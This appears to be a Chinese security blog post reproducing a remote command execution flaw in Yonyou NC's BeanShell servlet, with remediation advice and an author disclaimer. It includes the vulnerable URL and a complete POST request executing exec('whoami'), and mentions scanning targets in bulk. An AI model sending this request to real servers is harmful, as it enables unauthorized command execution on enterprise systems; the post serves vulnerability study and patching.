X友 NC 远程命令执行
X友 NC 远程命令执行
一、漏洞简介
用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。
用友NC存在反序列化漏洞,攻击者通过构造特定的HTTP请求,可以在目标服务器上远程执行任意命令。(用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限。)
二、漏洞影响
用友NC 全版本
三、漏洞复现
主页样式
漏洞url:
/servlet/~ic/bsh.servlet.BshServlet访问执行:
exec("whoami");
详细数据包:
POST /servlet/~ic/bsh.servlet.BshServlet
host: 127.0.0.1:8080
user-agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8bsh.script=exec("whoami");
简单批量一下
四、修复建议
1、用友NC为商业软件,可直接联系用友官方获得安全升级方案。
2、在官方安全补丁发布之前,建议相关企业严格限制用友NC的访问权限,禁止外部IP请求用友NC应用。
参考:
https://blog.csdn.net/weixin_45728976/article/details/106560286
http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20NC%20bsh.servlet.BshServlet%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html?h=%E7%94%A8%E5%8F%8B%20NC%20bsh.servlet.BshServlet%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E
往期用友漏洞:
用友GRP-u8 注入-RCE漏洞复现
注意:⚠️
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
如果本文内容侵权或者对贵公司业务或者其他有影响,请联系作者删除。
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
订阅查看更多复现文章、学习笔记
thelostworld
安全路上,与你并肩前行!!!!
thelostworld
开发、安全 学习-工作记录
79篇原创内容
公众号
个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
个人简书:https://www.jianshu.com/u/bf0e38a8d400
个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
个人博客园:https://www.cnblogs.com/thelostworld/
FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article
语雀博客主页:https://www.yuque.com/thelostworld
欢迎添加本公众号作者微信交流,添加时备注一下“公众号”
X友 NC 远程命令执行相关推荐
- 用友NC远程命令执行漏洞通告
用友NC远程命令执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)
- X友NC远程命令执行
一.漏洞描述 用友NC是一款企业级管理软件,在大中型企业广泛使用.实现建模.开发.继承.运行.管理一体化的IT解决方案信息化平台.用友 NC bsh.servlet.BshServlet目录存在远程命 ...
- exim远程命令执行漏洞分析(cve-2019-10149)
0x00 前言 在对Exim邮件服务器最新改动进行代码审计过程中,我们发现4.87到4.91版本之间的Exim存在一个远程命令执行(RCE)漏洞.这里RCE指的是远程命令执行(Remote Comma ...
- getshell之Nexus远程命令执行(CVE-2020-10199)
@MoCo菜弟弟 Nexus远程命令执行CVE-2020-10199 0x01漏洞描述 2020年03月31 日,Sonatype 官方发布安全公告,声明修复了存在于 Nexus Reposito ...
- GoAhead远程命令执行漏洞(CVE-2021-42342)
GoAhead远程命令执行漏洞(CVE-2021-42342) 目录 GoAhead远程命令执行漏洞(CVE-2021-42342) 漏洞描述 漏洞复现 启动环境 复现漏洞 漏洞描述 漏洞主要是由于上 ...
- 华为路由器远程命令执行漏洞复现(CVE-2017-17215)
华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值. CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞 ...
- 横向远程命令执行——DCOM
横向远程命令执行--DCOM 1. 测试环境 2. DCOM利用 2.1 DCOM使用 2.2 MMC20.Application 2.3 CLSID(9BA05972-F6A8-11CF-A442- ...
- ssh升级后+sftp+java_java中使用JSCH包,SFTP及SSH2文件操作及远程命令执行(改进)...
我写过一篇java中使用JSCH包,SFTP及SSH2文件操作及远程命令执行,现在想来,觉得调用方式太过于绕,不符合我写程序的风格,所以进行了改进. 参数类,用于配置连接的参数,SshConfigur ...
- webmin远程命令执行漏洞(cve-2019-15107)深入分析
漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...
最新文章
- Oracle创建用户设置权限
- Elasticsearch——Templates 模板
- 计算机实践报告800字,计算机软件专业大学生社会实践报告800字
- ashx连接mysql_对C#中的web访问mysql数据库的一些知识点进行了整理归纳总结
- 智能家居助手后台系统原型/智慧家居后台管理系统/应用分析/页面分析/设备分析/用户管理/运营管理/权限管理/系统设置/问题反馈/商城管理/消息管理/用户画像/公告管理/账号画像/留存用户/数据埋点
- DRDS 柔性事务漫谈
- ImportError: cannot import name 'imresize'
- PS 如何使用钢笔工具
- 单片机c51语言显示help,单片机入门-C51语言LCD12864液晶显示器的基本使用介绍
- c 语言编写的一元二次方程的根,C#程式求一元二次方程根
- 内存超频时序怎么调_一个傻瓜式内存超频教程
- 镁光 鸡血模式 linux,所以,镁光1100到底是不是全盘slc的模式?之前就几个帖子...
- 软件工程--团队作业2
- 职业学校计算机和机电哪个好,职业学校都有什么专业10大热门专业
- 【2021四川省赛】E.Don‘t Really Like How The Story Ends 图论
- 华为IoT首席架构师王启军:全栈工程师“养成记”
- 消化系统疾病病人的护理
- C语言实现24点小游戏
- Elasticsearch 索引模板
- 【更新于12.29】深度学习论文汇总
热门文章
- C++ 打怪游戏 小镇5.3.0--怪物狂欢季
- 数据中心和纯净住宅IP有什么区别?SOCKS5代理用哪个更好?
- 云服务器饥荒_阿里云搭建饥荒专用服务器
- 如何利用OUTLOOK邮箱提醒你每天上课把课程表导入日历
- 面试 腾讯 阿里 百度
- python 二重积分 辛普森法_二重积分的数值方法.doc
- linux进程通信核心态时间,Linux进程管理简谈
- PowerPoint2007通过版式创建幻灯片
- centos安装IBUS并添加98五笔
- Linux的jupyter lab启动,无法从远程的浏览器中访问